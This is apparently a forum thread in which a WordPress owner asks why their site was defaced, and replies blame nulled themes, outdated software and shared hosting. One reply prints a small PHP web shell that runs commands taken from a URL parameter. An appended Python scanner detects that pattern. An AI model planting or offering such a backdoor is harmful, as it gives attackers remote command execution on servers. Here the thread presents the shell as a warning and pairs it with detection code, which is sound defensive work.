Site got Hacked! Need Help finding the cause.

V

Hi,
I have a site on the WordPress platform which got hacked today. No real damage was done to the site: just the title and footer were changed to show "Hacked by ----blah blah----". I wasn't able to log in and I couldn't receive the email for resetting the password. I have the Limit Login Attempts and Wordfence plugins installed, and I receive emails when someone gets locked out trying password combinations, but nothing like that happened.

I had a backup and everything and I could have restored it right away, but that would have erased any traces of the login that I could find on my site. So, after thinking for some time, I decided to check the database of my website, since I know where the username and encrypted password are stored in the DB. I browsed it and found that the username had been changed; I didn't know if the password had been changed or not because it was encrypted. So I changed my username back, encrypted a password using the md5 algorithm and pasted it into the password field. Now I was able to log into my account. While browsing the DB to see what had happened, I also noticed that the blog title value had been changed, hence the change in the title and footer of the website. I changed it back and logged into my WP dashboard.

Now it was time to check the logs, and I saw that someone had logged into my WP account from an IP (I found the IP), but he didn't change anything besides the username, password and title. Well, one cannot change the username from the WP dashboard without using plugins, and I didn't see any trace of a new plugin installed on my site. So it must have been done by editing the DB. Plus he only changed the title, which is easy to change from the DB as well. That makes me think that he somehow got into my DB and changed those fields using some vulnerability (I am not ruling out the possibility that he first logged into WP and then changed everything from there).
Unless I find out the cause of my site getting hacked, I cannot do anything and he can/would edit my site again.
One solution I can think of is to remove the wp-login file when I am not going to log into my site, and upload it just before I want to log into the WP dashboard, but if it was the DB that got hacked then this won't help in any way.
So, anyone with experience, please give me some suggestions or help me if you can. I would really appreciate your help. :)
Thanks
 
Without looking at everything in depth and being a security guy it's close to impossible to figure that out.
 
Without looking at everything in depth and being a security guy it's close to impossible to figure that out.
you're already in my Skype contact list, so I'll talk to you when you get online! :)
thanks
 
Maybe you used a nulled theme? This usually happens with nulled stuff... The other thing I can think of now is that you are using an older version of WordPress that's exploitable. Must be one of these two.
 
Are you on a shared server? Then I guess he did symlinking, read your WP site config file and attacked your DB. When they set up symlinking on servers they can access your database without any problem. Then they can edit your email or password or anything (only on shared servers). If you are on a dedicated server he would have to find an exploit and execute commands to get access. Check your site, they may have added some back-doored files to your server.
 
Maybe you used a nulled theme? This usually happens with nulled stuff... The other thing I can think of now is that you are using an older version of WordPress that's exploitable. Must be one of these two.
hmmm, yeah it is a nulled theme! :( and maybe I didn't update my WP version on time, I guess. Now it's updated, so I hope that it doesn't happen again.
Are you on a shared server? Then I guess he did symlinking, read your WP site config file and attacked your DB. When they set up symlinking on servers they can access your database without any problem. Then they can edit your email or password or anything (only on shared servers). If you are on a dedicated server he would have to find an exploit and execute commands to get access. Check your site, they may have added some back-doored files to your server.
yeah it's shared hosting! I've used many online scanners and they show no warnings, so I guess it's fine, or should I look deeper? :)
 
The gift that keeps on giving.
Your host can tell where it entered.
They tend to quit answering when they know it was from them...
I would definitely dump anything null. Especially todsthumb
 
Simple SQL injection, probably in one of your plugins; if not, then there's a 50% chance it's another vulnerability in your plugins.
 
Shared hosting, Wordpress and a Nulled theme - no wonder you were hacked after all.
 
You are using a nulled theme....what's so hard to figure out? The whole point of nulling a theme is so you can hack people when they use it. No one is going to take their time nulling themes without inserting a hack into the code. You deserve to get hacked for being stupid and using a nulled theme.
 
Can I assume you're using Hostgator? All my sites hosted under Hostgator were hacked just a few days ago. Not sure if it's related.
no, I am not using hostgator. It's an offshore host. :)
Shared hosting, Wordpress and a Nulled theme - no wonder you were hacked after all.
The nulled theme isn't the problem, I checked it before using it. I checked it at a lot of places to be sure. I guess I didn't update WordPress on time.
You are using a nulled theme....what's so hard to figure out? The whole point of nulling a theme is so you can hack people when they use it. No one is going to take their time nulling themes without inserting a hack into the code. You deserve to get hacked for being stupid and using a nulled theme.
hmmm, if that's what you think then I am glad that not everyone on the internet thinks like you. There are people who do things to help other people. lol, yeah I deserve to be hacked if you say so. :p and I guess you always pay for all the software you use on your PC, and if the answer is no then stfu and get lost. :)
 
Check out my posts on this and implement. You will never get hacked again.

V1: http://www.blackhatworld.com/blackhat-seo/blogging/495526-guide-make-your-wordpress-blog-hackproof-complete-guide.html

V2: http://www.tech5.net/make-wordpress-blog-hack-proof-v2/
 
Check out my posts on this and implement. You will never get hacked again.

V1: http://www.blackhatworld.com/blackhat-seo/blogging/495526-guide-make-your-wordpress-blog-hackproof-complete-guide.html

V2: http://www.tech5.net/make-wordpress-blog-hack-proof-v2/
I already used most of the precautions, but not all. I will try to implement them now. Thanks for sharing mate :) ;)
 
hmmm, if that's what you think then I am glad that not everyone on the internet thinks like you. There are people who do things to help other people. lol, yeah I deserve to be hacked if you say so. :p and I guess you always pay for all the software you use on your PC, and if the answer is no then stfu and get lost. :)

You are pretty much asking for your website to be hacked when you use a nulled theme.

You can find a nulled version of every theme created....do you actually think people are taking the time to null them out of the goodness of their heart? Maybe, but more than likely no, they are not.

They insert malicious code and share the themes so people's sites get infected.

Sure there are some themes that are shared that are clean, but 90% are infected.

You should immediately stop using nulled themes. Themes are not something you can run in a virtual machine or in a sandbox like you can with cracked or nulled software on your computer. Once you install a nulled theme, you are installing edited code with a potentially malicious script in it.

And not to mention, the "nulling" process erases certain parts of the code and changes it, so that alone opens up security vulnerabilities that might not otherwise be in the theme.

If you actually care about your site not being hacked again, the first step would be removing the theme.

However, it's already probably too late to just "remove" the theme. If it was infected code, the only thing you can do is copy the posts and start fresh with a non-nulled theme.
 
There was a great lengthy article somewhere a few weeks ago, regarding the use of "free" premium themes (or nulled themes as we call them). It shows that a HUGE amount of them had malicious coding implemented.. not just redirects and link-jacking stuff but creating new users with admin capabilities without listing it to you, basically giving away a key to your website to the coder.

Can't find the article though.. I'm sure some of you read it, I think I remember Matt Cutts posting it on twitter?

Anyway, what I'm trying to say is: DON'T USE NULLED THEMES (if you don't know & trust who nulled them)
 
hmmm, yeah it is a nulled theme! :( and maybe I didn't update my WP version on time, I guess. Now it's updated, so I hope that it doesn't happen again.

yeah it's shared hosting! I've used many online scanners and they show no warnings, so I guess it's fine, or should I look deeper? :)

I highly recommend you clear everything and reinstall WP, because hackers can backdoor any PHP file with code like this.

Eg:

<?php
// Web shell: any value passed in the "silent" query parameter is run as a system command
$cmd = $_GET['silent'];
if (!empty($cmd)) {
    echo '<pre>';
    passthru($cmd);   // executes the attacker-supplied command and streams its output back
    echo '</pre>';
    exit();
}
?>

I don't think any scanner will detect this small piece of code, so think about it and take some strong action. :)
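As an added example (not code from the thread or from WordPress), here is a small scanner that looks for exactly the pattern of the backdoor above: request-controlled input ($_GET, $_POST, $_REQUEST, $_COOKIE) reaching a command-execution or eval function, either directly or through a variable assigned from it. The file names under the temporary directory are hypothetical; the two PHP samples are constructed inline.

```python
"""Flags PHP files that pass request-controlled input into a command-execution or eval
function, the pattern of the backdoor quoted above. Reports file, line number and line."""
import os
import re
import tempfile

EXEC_RE = re.compile(r"\b(?:passthru|system|exec|shell_exec|popen|proc_open|eval|assert)\s*\(")
REQ_RE = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b")
# A variable assigned straight from request data, e.g.  $cmd = $_GET['silent'];
ASSIGN_RE = re.compile(r"(\$\w+)\s*=\s*\$_(?:GET|POST|REQUEST|COOKIE)\b")

def scan_php_source(src):
    """Return [(line_no, line)] where an exec/eval call receives request-derived data."""
    tainted = set()  # variables seen holding request data earlier in the file
    hits = []
    for no, line in enumerate(src.splitlines(), start=1):
        tainted.update(ASSIGN_RE.findall(line))
        if not EXEC_RE.search(line):
            continue
        # Direct superglobal argument, or a tainted variable reaching the call.
        if REQ_RE.search(line) or any(re.search(re.escape(v) + r"\b", line) for v in tainted):
            hits.append((no, line.strip()))
    return hits

def scan_tree(root):
    """Scan every .php file under root; returns {path: hits} for files with at least one hit."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_php_source(fh.read())
                if hits:
                    findings[path] = hits
    return findings

# Constructed samples: the backdoor from the thread, and a benign theme file.
BACKDOOR = "<?php\n$cmd=$_GET['silent'];\nif(!empty($cmd)){\necho '<pre>';\npassthru($cmd);\necho '</pre>';\nexit();\n}\n?>"
BENIGN = "<?php\n$title = get_option('blogname');\necho esc_html($title);\n?>"

def demo():
    """Write the samples under a temp dir (hypothetical paths) and scan it; keyed by relative path."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "wp-content", "uploads"))
        for rel, body in (("wp-content/uploads/cache.php", BACKDOOR), ("header.php", BENIGN)):
            with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
                fh.write(body)
        return {os.path.relpath(p, root): h for p, h in scan_tree(root).items()}
```

This is string matching, so obfuscated variants (base64-encoded bodies, variable function names) evade it; treat a clean result as triage only, which is why the reinstall-from-known-good advice above still stands.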
 